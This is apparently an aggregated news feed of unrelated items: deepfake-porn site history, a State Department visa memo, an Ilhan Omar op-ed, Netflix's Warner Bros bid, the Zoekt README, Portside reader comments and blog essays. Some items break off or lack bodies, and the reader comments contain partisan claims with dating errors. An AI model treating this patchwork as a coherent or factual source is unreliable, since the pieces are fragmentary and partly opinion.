The film-maker and activist Sophie Compton spent many hours monitoring Mr DeepFakes while researching the award-winning 2023 documentary Another Body (available on iPlayer). “Looking back, I think that site played such an instrumental role in the proliferation of deepfakes overall,” she says. “I really think that there’s a world in which the site didn’t get made, wasn’t allowed to be made or was shut down quickly, and deepfake porn is just a fraction of the issue that we have today. Without that site, I don’t think it would have exploded in the way it did.”
In fact, that scenario was entirely possible. The origins of Mr
DeepFakes stretch back to 2017-18 when AI porn was just beginning to build on social media sites such as Reddit. One anonymous Redditor and AI porn “pioneer” who went by the name of “deepfakes” (and is thus credited with coining the term) gave an
early interview
to Vice about its potential. Shortly after, though, in early 2018,
Reddit banned deepfake porn
from its site. “We have screenshots from their message boards at that time and the deepfake community, which was small, was freaking out and jumping ship,” says Compton. This is when Mr DeepFakes was created, with the early domain name dpfks.com. The administrator carried the same username – dpfks – and was the person who advertised for volunteers to work as moderators, and posted rules and guidelines, as well as deepfake videos and an in-depth guide to using software for deepfake porn.
“What’s so depressing about reading the messages and seeing the genesis is realising how easily governments could have stopped this in its tracks,” says Compton. “The people doing it didn’t believe they were going to be allowed free rein. They were saying: ‘They’re coming for us!’, ‘They’re never going to let us do this!’ But as they continued without any problems at all, you see this growing emboldenment. Covid added to the explosion as everyone stopped moderating content. The output was violent – it was about degrading someone completely. The celebrities that were really popular were often really young – Emma Watson, Billie Eilish, Millie Bobby Brown.” (Greta Thunberg is another example here.)
Who was behind it? From time to time, Mr DeepFakes gave anonymous interviews. In a 2022 BBC documentary,
Deepfake
Porn: Could You Be Next?, the site’s “owner” and “web developer”, going by the pseudonym “deepfakes”, made the argument that consent from the women wasn’t required as “it’s a fantasy, it’s not real”.
Was money their motivation? Mr DeepFakes ran ads and had a premium membership paid in cryptocurrency – in 2020, one forum mentions that it made between $4,000 and
$7,000 a month. “There was a commercial aspect,” says Higgins. “It was a side hustle, but it was more than that. It gave this notoriety.”
At one point, the site “posted 6,000 pictures of AOC’s [the US politician Alexandria Ocasio-Cortez’s]
face in order that people could make deepfake pornography of her,” says Higgins. “It’s insane. [There were] all these files of YouTubers and politicians. What it’s saying is that if you’re a woman in this world you can only achieve so much because if you put your head above the parapet, if you have the temerity to do anything publicly, you can expect your image to be used in the most degrading way possible for personal profit.
“The most affecting thing for me was the language used about women on that site,” he continues. “We had to change it for our online report because we didn’t want it to be triggering, but this is pure misogyny. Pure hatred.”
This April, investigators began to believe that they had found Mr DeepFakes and sent emails to their suspect.
On 4 May, Mr DeepFakes shut down. A notice on its homepage blamed “data loss” caused by the withdrawal of a “critical service provider”. “We will not be relaunching,” it continued. “Any website claiming this is fake. This domain will eventually expire and we are not responsible for future use. This message will be removed in about a week.”
Mr DeepFakes is finished – but according to Compton, this could have happened so much sooner. “All the signs were there,” she says. The previous year, in April 2024, when the UK government
announced plans to
criminalise the creation and sharing of deepfake sexual abuse material
, Mr DeepFakes responded by immediately blocking access to UK users. (The plans were later shelved when the 2024 election was called.) “It showed that ‘Mr DeepFakes’ was obviously not so committed that there was nothing governments could do,” says Compton. “If it was going to become too much of a pain and a risk to run the site, then they weren’t going to bother.”
But deepfake porn has become so popular, so mainstream, that it no longer requires a “base camp”. “The things that those guys prided themselves on learning how to do and teaching others are now so embedded, they’re accessible to anyone on apps at the click of the button,” says Compton.
And for those wanting something more complex, the creators, the self-styled experts who once lurked on its forum, are now out there touting for business. Patrizia Schlosser knows this for sure. “As part of my research, I went undercover and reached out to some of the people on the forums, asking for a deepfake of an ex-girlfriend,” says Schlosser. “Although it’s often claimed the site was only about celebrities, that wasn’t true. The response was, ‘Yeah, sure …’
“After Mr DeepFakes shut down, I got an automatic email from one of them which said: “If you want anything made, let me know … Mr DeepFakes is down – but of course, we keep working.”
The Harry S. Truman Federal Building, headquarters of the U.S. Department of State, in a 2024 file photo.
Kevin Dietsch/Getty Images
The State Department is instructing its staff to reject visa applications from people who worked on fact-checking, content moderation or other activities the Trump administration considers "censorship" of Americans' speech.
The directive, sent in an internal memo on Tuesday, is focused on applicants for H-1B visas for highly skilled workers, which are frequently used by tech companies, among other sectors. The memo was first reported by
Reuters
; NPR also obtained a copy.
"If you uncover evidence an applicant was responsible for, or complicit in, censorship or attempted censorship of protected expression in the United States, you should pursue a finding that the applicant is ineligible" for a visa, the memo says. It refers to a policy
announced by Secretary of State Marco Rubio
in May restricting visas from being issued to "foreign officials and persons who are complicit in censoring Americans."
The Trump administration has been highly
critical
of tech companies' efforts to police what people are allowed to post on their platforms and of the broader field of trust and safety, the tech industry's term for teams that focus on preventing abuse, fraud, illegal content, and other harmful behavior online.
President Trump was banned from multiple social media platforms in the aftermath of his supporters' attack on the Capitol on Jan. 6, 2021. While those bans have since been lifted, the president and members of his administration frequently cite that experience as evidence for their
claims
that tech companies unfairly target conservatives — even as many tech leaders have
eased their policies
in the face of that
backlash
.
Tuesday's memo calls out H-1B visa applicants in particular "as many work in or have worked in the tech sector, including in social media or financial services companies involved in the suppression of protected expression."
It directs consular officers to "thoroughly explore" the work histories of applicants, both new and returning, by reviewing their resumes, LinkedIn profiles, and appearances in media articles for activities including combatting misinformation, disinformation or false narratives, fact-checking, content moderation, compliance, and trust and safety.
"I'm alarmed that trust and safety work is being conflated with 'censorship'," said Alice Goguen Hunsberger, who has worked in trust and safety at tech companies including OpenAI and Grindr.
"Trust and safety is a broad practice which includes critical and life-saving work to protect children and stop CSAM [child sexual abuse material], as well as preventing fraud, scams, and sextortion. T&S workers are focused on making the internet a safer and better place, not censoring just for the sake of it," she said. "Bad actors that target Americans come from all over the world and it's so important to have people who understand different languages and cultures on trust and safety teams — having global workers at tech companies in [trust and safety] absolutely keeps Americans safer."
In a statement, a State Department spokesperson who declined to give their name said the department does not comment on "allegedly leaked documents," but added: "the Administration has made clear that it defends Americans' freedom of expression against foreigners who wish to censor them. We do not support aliens coming to the United States to work as censors muzzling Americans."
The statement continued: "In the past, the President himself was the victim of this kind of abuse when social media companies locked his accounts. He does not want other Americans to suffer this way. Allowing foreigners to lead this type of censorship would both insult and injure the American people."
First Amendment experts criticized the memo's guidance as itself a potential violation of free speech rights.
"People who study misinformation and work on content-moderation teams aren't engaged in 'censorship'— they're engaged in activities that the First Amendment was designed to protect. This policy is incoherent and unconstitutional," said Carrie DeCell, senior staff attorney and legislative advisor at the Knight First Amendment Institute at Columbia University, in a statement.
Even as the administration has targeted those it claims are engaged in censoring Americans, it has also tightened its own scrutiny of
visa applicants' online speech
.
On Wednesday, the State Department
announced
it would require H-1B visa applicants and their dependents to set their social media profiles to "public" so they can be reviewed by U.S. officials.
NPR's Bobby Allyn and Michele Kelemen contributed reporting.
Trump Knows He’s Failing. Cue the Bigotry.
Portside
portside.org
2025-12-05 04:39:41
Trump Knows He’s Failing. Cue the Bigotry.
Photo credit: Farah Abdi Warsameh/Associated Press // New York Times
On Tuesday, President Trump
called
my friends and me “garbage.”
This comment was only the latest in a series of remarks and Truth Social posts in which the president has demonized and spread conspiracy theories about the Somali community and about me personally. For years, the president has spewed hate speech in an effort to gin up contempt against me. He reaches for the same playbook of racism, xenophobia, Islamophobia and division again and again. At one 2019 rally, he egged on his crowd
until it chanted
“send her back” when he
said my name
.
Mr. Trump denigrates not only Somalis but so many other immigrants, too, particularly those who are Black and Muslim. While he has consistently tried to vilify newcomers, we will not let him silence us. He fails to realize how deeply Somali Americans love this country. We are doctors, teachers, police officers and elected leaders working to make our country better. Over 90 percent of Somalis living in my home state, Minnesota, are American citizens by birth or naturalization. Some even supported Mr. Trump at the ballot box.
“I don’t want them in our country,” the president said this week. “Let them go back to where they came from.”
Somali Americans remain resilient against the onslaught of attacks from the White House. But I am deeply worried about the ramifications of these tirades. When Mr. Trump maligns me, it increases the number of death threats that my family, staff members and I receive. As a member of Congress, I am privileged to have access to security when these threats arise. What keeps me up at night is that people who share the identities I hold — Black, Somali, hijabi, immigrant — will suffer the consequences of his words, which so often go unchecked by members of the Republican Party and other elected officials. All Americans have a duty to call out this hateful rhetoric when we hear it.
The president’s dehumanizing and dangerous attacks on minority immigrant communities are nothing new. When he first ran for president a decade ago, he launched his campaign with claims that he was going to pause Muslim immigration to this country. He has since falsely accused Haitian migrants of eating pets and referred to Haiti and African nations as “shithole” countries. He has accused Mexico of sending rapists and drug peddlers across our border. It is unconscionable that he fails to acknowledge how this country was built on the backs of immigrants and mocks their ongoing contributions.
While the president wastes his time attacking my community,
my state, my governor
and me, the promises of economic prosperity he made in his run for president last year have not come to fruition. Prices have not come down; in many cases, they have risen. His implementation of tariffs has hurt farmers and small business owners. His policies have only worsened the affordability crisis for Americans. And now, with Affordable Care Act tax credits set to expire, health care costs for American households are primed to skyrocket, and millions of people risk losing their coverage under his signature domestic policy bill.
The president knows he is failing, and so he is reverting to what he knows best: trying to divert attention by stoking bigotry.
When I was sworn into Congress in 2019, my father turned to me and expressed bewilderment that the leader of the free world was picking on a freshman member of Congress, one out of 535 members of the legislative body. The president’s goal may have been to try to tear me down, but my community and my constituents rallied behind me then, just as they are now.
I often say that although Minnesota may be cold, the people here have warm hearts. Minnesota is special. That is why when so many Somalis arrived in this country, they chose the state as home. I am deeply grateful to the people of Minnesota for the generosity, hospitality and support they have shown to every immigrant community in our state.
We will not let Mr. Trump intimidate or debilitate us. We are not afraid. After all, Minnesotans not only welcome refugees, they also sent one to Congress.
Netflix has submitted the highest bid to date for Warner Bros. Discovery’s studio and streaming assets, according to people familiar with the secretive bidding process.
Netflix’s most recent offer, submitted on Thursday, valued the Warner Bros. studio, HBO Max streaming service and related parts of the company at around $28 per share, sources said.
Paramount also submitted a new bid on Thursday, closer to $27 per share, one of the sources added.
The two offers aren’t apples-to-apples, however, because Paramount has been trying to buy all of Warner Bros. Discovery, including CNN and other cable channels, while Netflix and another bidder, Comcast, have only shown interest in the studio and streaming assets.
The mega-media bidding war has intensified in recent days, captivating a wide swath of Hollywood and garnering attention from the Trump White House. Iconic brands like HBO and DC Comics hang in the balance.
Representatives for the companies involved have declined to comment. But leaks out of what is supposed to be a confidential process suggest that Netflix now has the pole position.
Paramount certainly perceives it that way; the company’s attorneys wrote to WBD CEO David Zaslav expressing “grave concerns” about the auction process.
Specifically, Paramount’s attorneys charged that WBD has “embarked on a myopic process with a predetermined outcome that favors a single bidder,” meaning Netflix.
Analysts said the letter could be a precursor to a hostile-takeover play by Paramount, which has moved aggressively in recent months under new CEO David Ellison’s leadership.
Late Thursday, Bloomberg reported that WBD and Netflix have entered exclusive talks.
Ellison kickstarted the auction process earlier in the fall by submitting multiple bids to Zaslav and the company’s board.
Analysts at the time predicted that a bidding war would break out, and that’s exactly what has happened, given that famed movie and TV studios rarely come onto the market.
Zaslav officially put up the for-sale sign in October. At the same time, he said that WBD’s previously announced plan to split the company into two publicly traded halves would continue to be pursued.
The WBD board had been under pressure to do something, since the company’s stock plummeted after it was formed through a 2022 merger, from roughly $25 a share to a low of $7.52.
The split plan helped to rejuvenate WBD’s shares earlier this year, and then word of Paramount’s offers sent the stock skyrocketing back toward $25.
Sources in Ellison’s camp have emphasized that Paramount would be disciplined in its pursuit of the Warner assets.
Meanwhile, people in Zaslav’s camp have argued that the proposed split was the best way to realize the value of all of WBD.
If the split still takes effect next year, the Warner Bros. half would house HBO Max and the movie studio, and the Discovery Global half would house CNN and other cable channels.
Paramount may have been trying to get ahead of the split by making unsolicited bids for the whole company.
Ellison’s pursuit is audacious, to be sure: Paramount’s market cap is currently one-fourth the size of WBD’s market cap.
But Ellison and his management team have been moving fast to revitalize Paramount and disprove skeptics across Hollywood.
It’s impossible to make sense of the WBD bidding war without understanding the “Trump card.”
Ellison and Paramount are perceived to have a mutually beneficial relationship with President Trump and the White House — and thus an advantage in getting any deal approved by the Trump administration. “That’s the Trump card,” an Ellison adviser remarked to CNN in October.
Past administrations proudly insisted that agencies like the Department of Justice, which enforces antitrust law, were independent of the president. Trump has replaced those norms with a new, overtly transactional approach.
Trump has repeatedly praised Ellison and his father Larry, Oracle’s executive chairman, who is a key player in Trump’s dealings with TikTok.
“They’re friends of mine. They’re big supporters of mine,” the president said in mid-October.
Numerous Republican lawmakers have also cheered the Ellison takeover of CBS and the rest of Paramount, especially the installation of Bari Weiss as editor in chief of CBS News.
Ellison has been both credited and criticized for forging a relationship with Trump’s inner circle this year despite donating nearly $1 million to Joe Biden’s reelection campaign last year.
Just a couple of weeks ago, Ellison landed an invitation to Trump’s White House dinner for Saudi Crown Prince Mohammed bin Salman.
What some have seen as savvy business practices, others have seen as media capitulation. And Ellison has stayed mostly quiet about the matter.
On Wednesday he was scheduled to appear at the DealBook Summit, an annual conference hosted by The New York Times in Manhattan. But he withdrew from the summit amid the negotiations with WBD and was later spotted back in Washington, D.C. for talks with officials there.
During the WBD bidding process, Paramount executives have bluntly argued that their offer will pass muster with Trump administration regulators while rival offers will not.
After all, any proposed sale could be held up for months, and even years, in Washington, either by Trump loyalists carrying out his wishes or by bureaucrats with genuine objections to media consolidation.
But Trump does not get a literal veto. When the Justice Department in 2017 sued to stop AT&T’s merger with Time Warner, a forerunner to WBD, the companies fought the case in court and prevailed.
Some Wall Street analysts have asserted that Netflix may be willing to stomach a similar legal battle.
Plus, Washington is not the only regulatory battleground that media companies have to worry about.
A WBD sale, in whole or in part, would face scrutiny in the United Kingdom, the European Union and some Latin American countries. Sources previously told CNN that the perception of Trump clearing the way for the Ellisons in the US could hurt them in other markets.
Media reports about Netflix emerging as the frontrunner for WBD’s studio and streaming assets have prompted some Republican elected officials to raise alarms about the prospective combination.
“Learning about Netflix’s ambition to buy its real competitive threat — WBD’s streaming business — should send alarm to antitrust enforcers around the world,” Sen. Mike Lee wrote on X. “This potential transaction, if it were to materialize, would raise serious competition questions — perhaps more so than any transaction I’ve seen in about a decade.”
A recent Bank of America analyst report put it this way: “If Netflix acquires Warner Bros., the streaming wars are effectively over. Netflix would become the undisputed global powerhouse of Hollywood beyond even its currently lofty position.”
Thoughts on Go vs. Rust vs. Zig
Simon Willison
simonwillison.net
2025-12-05 04:28:05
(via) Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this.
One thing that I hadn't noticed before is that none of these three languages implement class-based OOP.
"Zoekt, en gij zult spinazie eten" - Jan Eertink
("seek, and ye shall eat spinach" - My primary school teacher)
Zoekt is a text search engine intended for use with source code. (Pronunciation: roughly as you would pronounce "zooked" in English.)
Note: This has been the maintained source for Zoekt since 2017, when it was forked from the original repository github.com/google/zoekt.
Background
Zoekt supports fast substring and regexp matching on source code, with a rich query language
that includes boolean operators (and, or, not). It can search individual repositories, and search
across many repositories in a large codebase. Zoekt ranks search results using a combination of code-related signals
like whether the match is on a symbol. Because of its general design based on trigram indexing and syntactic
parsing, it works well for a variety of programming languages.
The two main ways to use the project are:
Through individual commands, to index repositories and perform searches through Zoekt's query language
Or, through the indexserver and webserver, which support syncing repositories from a code host and searching them through a web UI or API
Note: It is also recommended to install Universal ctags, as symbol information is a key signal in ranking search results. See ctags.md for more information.
Command-based usage
Zoekt supports indexing and searching repositories on the command line. This is most helpful
for simple local usage, or for testing and development.
Indexing a local git repo
go install github.com/sourcegraph/zoekt/cmd/zoekt-git-index
$GOPATH/bin/zoekt-git-index -index ~/.zoekt /path/to/repo
Indexing a local directory (not git-specific)
go install github.com/sourcegraph/zoekt/cmd/zoekt-index
$GOPATH/bin/zoekt-index -index ~/.zoekt /path/to/repo
Searching an index
go install github.com/sourcegraph/zoekt/cmd/zoekt
$GOPATH/bin/zoekt 'hello'
$GOPATH/bin/zoekt 'hello file:README'
Zoekt services
Zoekt also contains an index server and web server to support larger-scale indexing and searching
of remote repositories. The index server can be configured to periodically fetch and reindex repositories
from a code host. The webserver can be configured to serve search results through a web UI or API.
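Starting the indexserver

The commands below are a sketch of the indexserver invocation that the next paragraph refers to. The zoekt-indexserver command and its -mirror_config flag follow the upstream README pattern, but treat the exact flag names and the config format as assumptions and consult config.go for the authoritative options.

go install github.com/sourcegraph/zoekt/cmd/zoekt-indexserver

cat > config.json << EOF
[{"GithubOrg": "apache"}]
EOF

$GOPATH/bin/zoekt-indexserver -mirror_config config.json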
This will fetch all repos under 'github.com/apache', then index the repositories. The indexserver takes care of periodically fetching and indexing new data, and cleaning up logfiles. See config.go for more details on this configuration.
Starting the web server
go install github.com/sourcegraph/zoekt/cmd/zoekt-webserver
$GOPATH/bin/zoekt-webserver -index ~/.zoekt/
If you start the web server with -rpc, it exposes a simple JSON search API at http://localhost:6070/api/search; an example request is sketched after the feature list below.
The JSON API supports advanced features including:
Streaming search results (using the FlushWallTime option)
Alternative BM25 scoring (using the UseBM25Scoring option)
Context lines around matches (using the NumContextLines option)
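As a rough illustration only (this request is not taken from the README, and the Q and Opts field names are assumptions about the JSON request shape, so check the API source if they differ), a search against this endpoint might look like:

curl -XPOST --header 'Content-Type: application/json' \
  --data '{"Q": "hello file:README", "Opts": {"NumContextLines": 2}}' \
  http://localhost:6070/api/search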
Finally, the web server exposes a gRPC API that supports structured query objects and advanced search options.
Acknowledgements
Thanks to Han-Wen Nienhuys for creating Zoekt. Thanks to Alexander Neubeck for
coming up with this idea, and helping Han-Wen Nienhuys flesh it out.
Tidbits-Dec. 4-Reader Comments: No War on Venezuela; Hegseth Murder in the Caribbean; Mass Deportation Is NOT Deportation; Everyone Is Talking About Affordability; Peace in Ukraine & Peace in Europe; New Unreleased Song by John Lennon; Lots More…
Portside
portside.org
2025-12-05 03:48:09
...
Discussion of outlawing stock buybacks that were once illegal would be a crucial way to address the wage issue.
Given the corruption of our lawmakers this has a very long shot of being realized but like Medicare for All it is a crucial demand to raise and tie to the problem of depressed wages.
Jessica Benjamin
Students attending school in the winter, mostly in the Midwest or on the East Coast, get a Snow Day: if a heavy snowstorm blankets their town, school is canceled and kids can play all day. In Los Angeles, students have not been going to school out of fear of being terrorized and kidnapped by our own government. You can keep ICE Day.
This is horrible; I was a shop steward for 35 years in the carpenters union local 157 NYC.
We take a harassment class and get certified among a dozen other certifications.
None of this only happens on non union jobs.
No woman is harassed on any of my jobs let alone killed?
Harassment of women is on the rise and maybe it is because a rapist is in the White House?
You can’t just look the other way, if you do you are an enabler.
There are so many things the public sees and turns a blind eye to!!!
Humans are tribal, and we have good tribes and bad; it is your choice.
You can’t stand and listen to the president call a woman reporter “Piggie” and not call him out on the spot.
Stupid and arrogant are not very good qualities in the most powerful job in the world.
My union is the only place where women get paid the same pay as the men.
Speak up not after the fact.
Manipulation is rampant.
John Campo
Given that Trump is now pardoning drug traffickers—and we’ve watched him hand out clemency and favors to people who bought into his latest crypto grift—it’s becoming pretty clear that these so-called traffickers have one guaranteed way to avoid being targeted: buy what Trump is selling.
"International law also requires adhering to the International Court of Justice advisory opinion in July 2024, which ruled that the entire occupation of Palestinian territories is illegal and must end. That would mean insisting that Israel withdraw from sovereign Palestinian territory, as the international force moves in for the transition to Palestinian governance. An international force, from the Palestinian perspective, is welcome under those terms – a whole chapter in the Palestinian Armistice plan is devoted to the issue."
The Party of the European Left has condemned Russia’s military aggression against Ukraine as a violation of international law and denial of Ukraine’s sovereignty. However the EL has not aligned itself with NATO whose objective has been to end the war through military means. The ongoing war in Ukraine has claimed hundreds of thousands of lives, destroyed hundreds of towns and villages, and forced millions of people to flee. The danger of escalation into a general war between Russia and NATO persists and continues to grow. The EL stresses once more that all political and diplomatic initiatives aimed at achieving a ceasefire, bringing the war to a lasting and durable end, and preventing any further escalation must be taken, strengthened, and implemented immediately. Our solidarity can only be with the victims—the soldiers, civilians, refugees, and conscientious objectors on both sides—and not with the imperialist interests that fuel the conflict.
I would call it building a coalition around central shared goals. In the past it has too often been a move to the so-called center, which has been to capitulate to corporate Dems and to soft-pedal imperialist atrocities, abandoning the interest of working people in the process. If the goals remain true to achieving affordability and dignity for ordinary working people of all races and religions, then let's give it a try. There are lots of good people out there. We may have differences about exactly how to achieve our goals, but so many have ideas and experience that can help build a brand new plan, an effective plan that has never existed before.
Are you going to believe your lying wallet or your lying president?
When Donald Trump became president in 2016, he was fortunate that he was inheriting President Barack Obama's economy. It was such a strong economy he inherited that it took him almost 4 years to fuck it up. Although throughout those four years, Trump took credit for the economy that the Black man created for him. What was really messed up is that in 2024, voters forgot who created that economy, and they restored Donald Trump back into the presidency, believing he had something to do with it. Not only did voters forget that Donald Trump had nothing to do with creating a great economy, but they also forgot that he ruined President Obama's great economy and left office in 2020 with the biggest loss of jobs since Hoover.
In 2024, Trump ran against Biden's economy, which most people felt was not strong enough. Since Trump has returned to office, the economy has gotten worse. While he claims the inflation he inherited from Biden was bad, it has gotten worse, too, since he's been in charge. Voters are starting to figure out that Trump has no idea how to build an economy. What might be freaking Trump out is that he might be realizing it, too.
Donald Trump knows how to rage-tweet while sitting on the toilet at 3 AM. Managing the largest economy in the world, not so much.
A recent Fox News poll found that 76% of voters view the economy negatively. Another poll by the Economist and YouGov finds that 58% disapprove of the job Trump is doing. Trump's polls on the economy are worse than Biden's were.
Even Trump must realize that, since he is lifting all tariffs on commodities like coffee, meat, and other foods. I guess we are supposed to forget his belief that tariffs don't raise prices, which is hard to argue while tariffs are raising prices. TACO indeed.
But Trump is becoming frustrated with the public for not appreciating the job he sucks at. During a cabinet meeting yesterday, Trump declared that affordability “doesn’t mean anything to anybody.” I'm sure it means something to all those congressional Republicans retiring before the midterms.
Trump called the issue of affordability a “fake narrative” and “con job” created by Democrats to dupe the public.
He said, “They just say the word. It doesn’t mean anything to anybody. They just say it — affordability. I inherited the worst inflation in history. There was no affordability. Nobody could afford anything.”
Of course, Trump, along with voters, forgets that President Biden inherited Trump's economy in 2020. The difference between Trump and Biden inheriting bad economies is that Biden fixed the one he got.
Republicans left bad economies for presidents Clinton, Obama, and Biden. And those presidents fixed them. Republicans are great at trashing economies, while Democrats are great at repairing them.
Donald Trump was calling himself the “affordability president,” but he's really only affordable for the people who bribe him, like crypto moguls and Saudi royalty. Democrats are going to be running a lot of commercials with Trump's affordability/con job comment.
I just hope the economy isn't trashed beyond repair by the time a Democrat is elected to repair the damage Trump has done to it.
Your MR. FISH’S CATCH OF THE DAY for Tuesday, December 4, 2025, is an unreleased Beatles song that I’ve been listening to for 40 years. It’s called Watching Rainbows and was recorded in 1969 during the Let It Be sessions as an improvised Lennon throwaway. Remarkably, it was not included in Peter Jackson’s documentary miniseries, Get Back, nor was it included on any of the Anthology releases. Here are the lyrics, most likely invented by Lennon on the spot:
Standing in the garden waiting for the sun to shine
With my umbrella with its head I wish it was mine
Everybody knows…
Instead of watching rainbows I’m gonna make me some
I said I’m watching rainbows I’m gonna make me some
Standing in the garden waiting for the English sun to come and make me brown so I can be someone
Looking at the bench of next door neighbors
Crying, I said c’mon, I said, save us
Everybody’s got to have something hard to hold
Well, instead of watching rainbows under the sun
You gotta get out son and make you one
You gotta get out son and make your own
Because you’re ain’t gonna make it if you don’t
Shoot me
Shoot me
Whatever you do you gotta kill somebody to get what you wanna get
You gotta shoot me
You gotta shoot me
Please shoot me
Even before the Now and Then single was released in 2023 and announced as the “last Beatles song,” I thought Rainbows should be stitched together with McCartney’s Pillow for Your Head and Harrison’s Mother Divine, both incomplete compositions from the same time period, and released as a B-side medley to a re-release of the medley that closed out Abbey Road. The connecting tissue for Divine Rainbow Pillow could be composed by the two surviving members of the band, of course. In other words, now that we’ve all heard Now and Then and had our hearts broken by its mediocre production and flabby, uninspired demeanor, I can’t be alone in wishing there was a better swan song for the group! (Additionally, I have no fewer than 10 solo Lennon tracks that he recorded in the late 70s that all would’ve been better to riff off of for a “last” Beatles song—anything other than Now and Then, but I’ll save those for a later post - ha!)
Mon, Dec 8 ⸱ 2-3pm ET • 1-2pm CT • Noon-1pm MT • 11am-Noon PT
Virtual Event ⸱ Zoom link shared after registration
Join Movement Voter PAC for our final briefing of the year – more of a “fireside chat” with movement leaders! – to celebrate our successes in 2025 and look ahead to 2026.
We will record this briefing and send it to all who register.
After the briefing, you are welcome to join an optional 30-minute informal Q&A.
This is a partisan, political event. We invite our 501(c)(3) supporters and partners to attend in their personal capacity. Please consult your organization's legal counsel with any questions.
About Movement Voter PAC
MVP funds local organizing and movement-building groups working to shift culture, win power, and shape policy.
We just put out our 2025 recap — if you haven’t yet, check it out to see the incredible work MVP partners did this year to push for policy progress, turn back the tide of authoritarianism, and win the biggest elections of the year.
MVP operates like a “mutual fund” for political giving: We raise money from donors, then channel it toward the most impactful organizations and power-building work around the country.
We do the research so you don’t have to, streamlining your giving and maximizing your impact by investing in the most effective organizations and innovative strategies. (Bonus: You get to hit "unsubscribe" on all the political fundraising spam in your inbox!)
I feel a change is happening in how people produce and (want to) consume software, and I want to give my two cents on the matter.
It has become more mainstream to see people critical of "Big Tech". Enshittification has become a familiar term even outside the geek community. Obnoxious "AI" features that nobody asked for get crammed into products. Software that spies on its users is awfully common. Software updates have started crippling existing features, or have deliberately stopped being available, so more new devices can be sold. Finally, it is increasingly common to get obnoxious ads shoved in your face, even in software you have already paid for.
In short, it has become hard to really trust software. It often does not act in the user's best interest. At the same time, we are entrusting software with more and more of our lives.
Thankfully, new projects are springing up which are using a different governance model. Instead of a for-profit commercial business, there is a non-profit backing them. Some examples of more or less popular projects:
Some of these are older projects, but there seems to be something in the air that is causing more projects to move to non-profit governance, and for people to choose these.
As I was preparing this article, I saw an announcement that ghostty now has a non-profit organisation behind it. At the same time, I see more reports from developers leaving GitHub for Codeberg, and in the mainstream more and more people are switching to Signal.
From a user perspective, free software and open source software (FOSS) has advantages over proprietary software. For instance, you can study the code to see what it does. This alone can deter manufacturers from putting in user-hostile features. You can also remove or change what you dislike or add features you would like to see. If you are unable to code, you can usually find someone else to do it for you.
Unfortunately, this is not enough. Simply having the ability to see and change the code does not help when the program is a web service. Network effects will ensure that the "main instance" is the only viable place to use this; you have all your data there, and all your friends are there. And hosting the software yourself is hard for non-technical people. Even highly technical people often find it too much of a hassle.
Also, code can be very complex! Often, only the team behind it can realistically further develop it. This means you can run it yourself, but are still dependent on the manufacturer for the direction of the product. This is how you get, for example, AI features in GitLab and ads in Ubuntu Linux. One can technically remove or disable those features, but it is hard to keep such a modified version (a fork) up to date with the manufacturer's more desirable changes.
The reason is that the companies creating these products are still motivated by profit and increasing shareholder value. As long as the product still provides (enough) value, users will put up with misfeatures. The (perceived) cost of switching is too high.
Let us say a non-profit is behind the software. It is available under a 100% FOSS license. Then there are still ways things can go south. I think this happens most commonly if the funding is not in order.
For example, Mozilla is often criticised for receiving funding from Google. In return, it uses Google as the default search. To make it less dependent on Google, Mozilla acquired Pocket and integrated it into the browser. It also added ads on the home screen. Both of these actions have also been criticized. I do not want to pick on Mozilla (I use Firefox every day). It has clearly been struggling to make ends meet in a way that is consistent with its goals and values.
I think the biggest risk factor is (ironically) if the non-profit does not have a sustainable business model and has to rely on funding from other groups. This can compromise the vision, like in Mozilla's case. For web software, the obvious business model is a SaaS platform that offers the software. This allows the non-profit to make money from the convenience of not having to administer it yourself.
Ah, good old volunteer driven FOSS. Personally, I prefer using such software in general. There is no profit motive in sight and the developers are just scratching their own itch. Nobody is focused on growth and attracting more customers. Instead, the software does only what it has to do with a minimum of fuss.
I love that aspect, but it is also a problem. Developers often do not care about ease of use for beginners. Software like this is often a power tool for power users, with lots of sharp edges. Perfect for developers, not so much for the general public.
More importantly, volunteer driven FOSS has other limits. Developer burn-out happens more than we would like to admit, and for-profit companies tend to strip-mine the commons.
There are some solutions available for volunteer-driven projects. For example Clojurists together, thanks.dev, the Apache Foundation, the Software Freedom Conservancy and NLNet all financially support volunteer-driven projects. But it is not easy to apply to these, and volunteer-driven projects are often simply not organized in a way to receive money.
With a non-profit organisation employing the maintainers of a project, there is more guarantee of continuity. It also can ensure that the "boring" but important work gets done. Good interface design, documentation, customer support. All that good stuff. If there are paying users, I expect that you get some of the benefits of corporate-driven software and less of the drawbacks.
That is why I believe these types of projects will be the go-to source for sustainable, trustworthy software for end-users. I think it is important to increase awareness about such projects. They offer alternatives to Big Tech software that are palatable to non-technical users.
Warner Bros Begins Exclusive Deal Talks With Netflix
Before social media became what it is today I used to blog a lot. And I wasn't the only one, many people did. There was this idea of a decentralized and open web: everyone had their own little space on the web (with a selfhosted blog, or a platform like wordpress or blogger). The internet looks very different now. People consume (and produce) more on the internet than ever before, but almost all content lives on these big social media platforms designed to keep everything and everyone inside. It feels like the web is shrinking.
There seems to be some resurgence into the old web now, time will tell if it gains any real ground. It's an uphill battle: Besides most online eyeballs now being glued to social media apps, we're seeing AI take over the way people interact with the internet altogether. Back in the old days if you wanted to know more about something you'd google the term and start going through the websites Google said are most relevant. Now AI is a lot more efficient in getting you the answer to whatever you want to know in front of you in real time. If the answer was on a forum, blog or any other website the AI will fetch it behind the scenes and summarize it for you. From a UX perspective this is the obvious direction things will continue to go.
A second problem is that of quality: people who put a lot of time in their content (and are very good writers) can now more easily get paid for their work, through paid email newsletters and paywalled websites. All of their content doesn't live on the open web anymore (but at least there are no ads here). This is probably a win for writers, as well as the quality of the overall content being produced (and read) globally, but it's a loss for the open web.
So if you have a blog nowadays with all kinds of useful information (ignoring the discoverability as well as whether other people actually find it useful), how many people are really going to read it directly? Should you still put time into designing your blog and writing good articles?
Fighting fire (AI) with fire (AI)
Regardless of all of this, I feel a (nostalgic) desire to blog again. I used to keep two blogs: this techblog you are reading now and a travel/picture blog called mijnrealiteit. Whenever I get this feeling, I start with updating the blog software. Throughout the years both blogs have gone through different iterations: from custom CMS systems, to WordPress instances with custom themes, to ending up with simple statically generated websites. You can find some historical posts here.
So towards an AI coding tool I turn, which has the power to write/change hundreds of lines of code in seconds with a simple one-sentence instruction. AI coding tools are a widely debated topic in programming circles. They can clearly write a lot of code very quickly, and in my experience there are definitely cases where the speed/quality outpaces what a human developer can do. But there are also many cases where they write junk (called slop) and do things that make no sense.
